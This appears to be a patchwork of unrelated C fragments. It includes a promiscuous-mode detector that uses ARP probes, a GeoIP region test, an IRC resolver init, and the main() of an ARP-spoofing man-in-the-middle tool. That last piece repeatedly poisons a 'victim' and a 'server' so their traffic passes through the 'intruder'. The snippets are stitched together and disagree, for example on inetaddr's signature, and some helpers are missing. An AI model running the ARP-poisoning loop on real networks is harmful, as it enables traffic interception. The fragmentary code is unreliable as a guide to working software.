static void getaddr(struct sockaddr **dst, int *len, char *name, char *port) { if (*name == '/') { unixaddr(dst, len, name); return; } inetaddr(dst, len, name, port); }
void main (int argc, char **argv) { int rec; int len, from_len, rsflags; struct ifreq if_data; struct sockaddr from; u_int8_t myMAC[6]; u_int32_t myIP, myNETMASK, myBROADCAST, ip, dip; if (getuid () != 0) { perr ("You must be root to run this program!\n"); exit (0); } if (argc != 2) { fprintf(stderr,"Usage: %s eth0\n", argv[0]); exit (0); } if ((rec = socket (AF_INET, SOCK_PACKET, htons (ETH_P_ARP))) < 0) { perror("socket"); exit (0); } printf ("----------------------------------------------------------\n"); strcpy (if_data.ifr_name, argv[1]); if (ioctl (rec, SIOCGIFHWADDR, &if_data) < 0) { perr ("can't get HW addres of my interface!\n"); exit(1); } memcpy (myMAC, if_data.ifr_hwaddr.sa_data, 6); printf ("> My HW Addr: %s\n", hwaddr (myMAC)); if (ioctl (rec, SIOCGIFADDR, &if_data) < 0) { perr ("can't get IP addres of my interface!\n"); exit(1); } memcpy ((void *) &ip, (void *) &if_data.ifr_addr.sa_data + 2, 4); myIP = ntohl (ip); printf ("> My IP Addr: %s\n", inetaddr(ip)); if (ioctl (rec, SIOCGIFNETMASK, &if_data) < 0) perr ("can't get NETMASK addres of my interface!\n"); memcpy ((void *) &ip, (void *) &if_data.ifr_netmask.sa_data + 2, 4); myNETMASK = ntohl (ip); printf ("> My NETMASK: %s\n", inetaddr(ip)); if (ioctl (rec, SIOCGIFBRDADDR, &if_data) < 0) perr ("can't get BROADCAST addres of my interface!\n"); memcpy ((void *) &ip, (void *) &if_data.ifr_broadaddr.sa_data + 2, 4); myBROADCAST = ntohl (ip); printf ("> My BROADCAST: %s\n", inetaddr(ip)); if ((rsflags = fcntl (rec, F_GETFL)) == -1) { perror ("fcntl F_GETFL"); exit (1); } if (fcntl (rec, F_SETFL, rsflags | O_NONBLOCK) == -1) { perror ("fcntl F_SETFL"); exit (1); } printf ("----------------------------------------------------------\n"); printf ("> Scanning ....\n"); for (dip = (myIP & myNETMASK) + 1; dip < myBROADCAST; dip++) { bzero(full_packet, MAX_PACK_LEN); memcpy (arp_pkt.dst_mac, "\0\6\146\3\23\67", 6); /* 00:06:66:03:13:37 :) */ memcpy (arp_pkt.src_mac, myMAC, 6); arp_pkt.pkt_type = htons( ETH_P_ARP ); arp_pkt.hw_type = htons( 0x0001 ); arp_pkt.hw_len = 6; arp_pkt.pro_type = htons( 0x0800 ); arp_pkt.pro_len = 4; arp_pkt.arp_op = htons (ARPREQUEST); memcpy (arp_pkt.sender_eth, myMAC, 6); ip = htonl (myIP); memcpy (arp_pkt.sender_ip, &ip, 4); memcpy (arp_pkt.target_eth, "\0\0\0\0\0\0", 6); ip = htonl (dip); memcpy (arp_pkt.target_ip, &ip, 4); strcpy(from.sa_data, argv[1]); from.sa_family = 1; if( sendto (rec, full_packet, sizeof (struct arp_struct), 0, &from, sizeof(from)) < 0) perror ("sendto"); usleep (333); len = recvfrom (rec, full_packet, MAX_PACK_LEN, 0, &from, &from_len); if (len <= ETHER_HEADER_LEN) continue; memcpy (&ip, arp_pkt.target_ip, 4); if (ntohs (arp_pkt.arp_op) == ARPREPLY && ntohl (ip) == myIP) { memcpy (&ip, arp_pkt.sender_ip, 4); printf ("*> Host %s, %s **** Promiscuous mode detected !!!\n", inetaddr (ip), hwaddr (arp_pkt.sender_eth)); } } printf ("> End.\n"); exit (0); }
int main() { GeoIP *gi; GeoIPRegion *gir, giRegion; FILE *f; char ipAddress[30]; char expectedCountry[3]; char expectedCountry3[4]; const char *time_zone; gi = GeoIP_open("../data/GeoIPRegion.dat", GEOIP_MEMORY_CACHE); if (gi == NULL) { fprintf(stderr, "Error opening database\n"); exit(1); } f = fopen("region_test.txt", "r"); if (f == NULL) { fprintf(stderr, "Error opening region_test.txt\n"); exit(1); } gir = GeoIP_region_by_addr(gi, "10.0.0.0"); if (gir != NULL) { printf("lookup of private IP address: country = %s, region = %s\n", gir->country_code, gir->region); } while (fscanf(f, "%s%s%s", ipAddress, expectedCountry, expectedCountry3) != EOF) { printf("ip = %s\n", ipAddress); gir = GeoIP_region_by_name(gi, ipAddress); if (gir != NULL) { time_zone = GeoIP_time_zone_by_country_and_region(gir->country_code, gir->region); printf("%s, %s, %s, %s\n", gir->country_code, (!gir->region[0]) ? "N/A" : gir->region, _mk_NA(GeoIP_region_name_by_code (gir->country_code, gir->region)), _mk_NA(time_zone)); } else { printf("NULL!\n"); } GeoIP_assign_region_by_inetaddr(gi, inetaddr(ipAddress), &giRegion); if (gir != NULL) { assert(giRegion.country_code[0]); assert(!strcmp(gir->country_code, giRegion.country_code)); if (gir->region[0]) { assert(giRegion.region[0]); assert(!strcmp(gir->region, giRegion.region)); } else { assert(!giRegion.region[0]); } } else { assert(!giRegion.country_code[0]); } if (gir != NULL) { GeoIPRegion_delete(gir); } } GeoIP_delete(gi); fclose(f); return 0; }
int init_resolver(int op) { int ret = 0; #ifdef LRAND48 srand48(time(NULL)); #endif if (op & RES_INITLIST) { bzero((char *)&reinfo, sizeof(reinfo)); first = last = NULL; } if (op & RES_CALLINIT) { ret = ircd_res_init(); if (!ircd_res.nscount) { ircd_res.nscount = 1; #ifdef INET6 if (!inetpton(AF_INET6, "::1", &ircd_res.nsaddr_list[0].sin6_addr.s6_addr)) { bcopy(minus_one, ircd_res.nsaddr_list[0].sin6_addr.s6_addr, IN6ADDRSZ); } #else ircd_res.nsaddr_list[0].sin_addr.s_addr = inetaddr("127.0.0.1"); #endif } } if (op & RES_INITSOCK) { int on = 0; ret = resfd = socket(AFINET, SOCK_DGRAM, 0); (void) SETSOCKOPT(ret, SOL_SOCKET, SO_BROADCAST, &on, on); /* The following frame is a hack to allow resolving * in FreeBSD jail(). As it is harmless elsewhere, it is * not #ifdef-ed. * Note that currently IPv6 within jail() is not * supported by the FreeBSD. */ { struct SOCKADDR_IN res_addr; memset(&res_addr, 0, sizeof(res_addr)); res_addr.SIN_FAMILY = AFINET; #ifdef INET6 res_addr.sin6_addr = in6addr_any; #else res_addr.sin_addr.s_addr = htonl(INADDR_ANY); #endif bind(resfd, (SAP) &res_addr, sizeof(res_addr)); } } #ifdef DEBUG if (op & RES_INITDEBG); ircd_res.options |= RES_DEBUG; #endif if (op & RES_INITCACH) { bzero((char *)&cainfo, sizeof(cainfo)); bzero((char *)hashtable, sizeof(hashtable)); } if (op == 0) ret = resfd; return ret; }
int main (int argc, char **argv) { struct ifreq if_data; int sockd; /* IPs & MACs */ unsigned int S_ip[4]; unsigned int S_mac[6]; unsigned int V_ip[5]; unsigned int V_mac[6]; unsigned int I_ip[4]; unsigned int I_mac[6]; u_int32_t local_ip; if (argc!=3) { printf ("%s ip_server ip_victim\n", argv[0]); exit(EXIT_FAILURE); } /* Read params */ sscanf (argv[1], "%d.%d.%d.%d", &S_ip[0], &S_ip[1], &S_ip[2], &S_ip[3]); sscanf (argv[2], "%d.%d.%d.%d", &V_ip[0], &V_ip[1], &V_ip[2], &V_ip[3]); /* server's MAC */ sscanf (getmacfromarpcache(argv[1]) ,"%2X:%2X:%2X:%2X:%2X:%2X", &S_mac[0], &S_mac[1], &S_mac[2], &S_mac[3], &S_mac[4], &S_mac[5]); /* victim's MAC */ sscanf (getmacfromarpcache(argv[2]) ,"%2X:%2X:%2X:%2X:%2X:%2X", &V_mac[0], &V_mac[1], &V_mac[2], &V_mac[3], &V_mac[4], &V_mac[5]); if ((sockd = socket (AF_INET, SOCK_DGRAM, 0)) < 0) { perror("socket"); exit (0); } strcpy (if_data.ifr_name, "eth0"); /* Intruder's MAC */ if (ioctl (sockd, SIOCGIFHWADDR, &if_data) < 0) { perror ("ioctl(): SIOCGIFHWADDR \n"); exit(EXIT_FAILURE); } memcpy (I_mac, if_data.ifr_hwaddr.sa_data, 6); /* Intruder's IP */ if (ioctl (sockd, SIOCGIFADDR, &if_data) < 0) { perror ("ioctl(); SIOCGIFADDR \n"); exit(EXIT_FAILURE); } memcpy ((void *) &local_ip, (void *) &if_data.ifr_addr.sa_data + 2, 4); sscanf (inetaddr(local_ip), "%d.%d.%d.%d", &I_ip[0], &I_ip[1], &I_ip[2], &I_ip[3]); printf("\n\n %s\t\t%s \n" \ " (S) _____ _____ (V) \n" \ " \\ / \n" \ " \\ / \n" \ " \\ / \n" \ " | \n" \ " (I) \n" \ " %s \n\n\n", argv[1], argv[2], inetaddr(local_ip) ); int pid = fork(); if (pid < 0) { printf ("fork()"); exit(EXIT_FAILURE); } if (pid != 0) { while (1) { /* Tell victim that "Server's IP" has "Intruder's MAC" */ send_arp_packet(I_mac, S_ip, V_mac, V_ip); /* Tell server that "Victim's IP" has "Intruder's MAC" */ send_arp_packet (I_mac, V_ip, S_mac, S_ip); sleep(1); } } else { redirect_packet(I_mac, S_mac, S_ip, V_mac, V_ip ); } return 0; }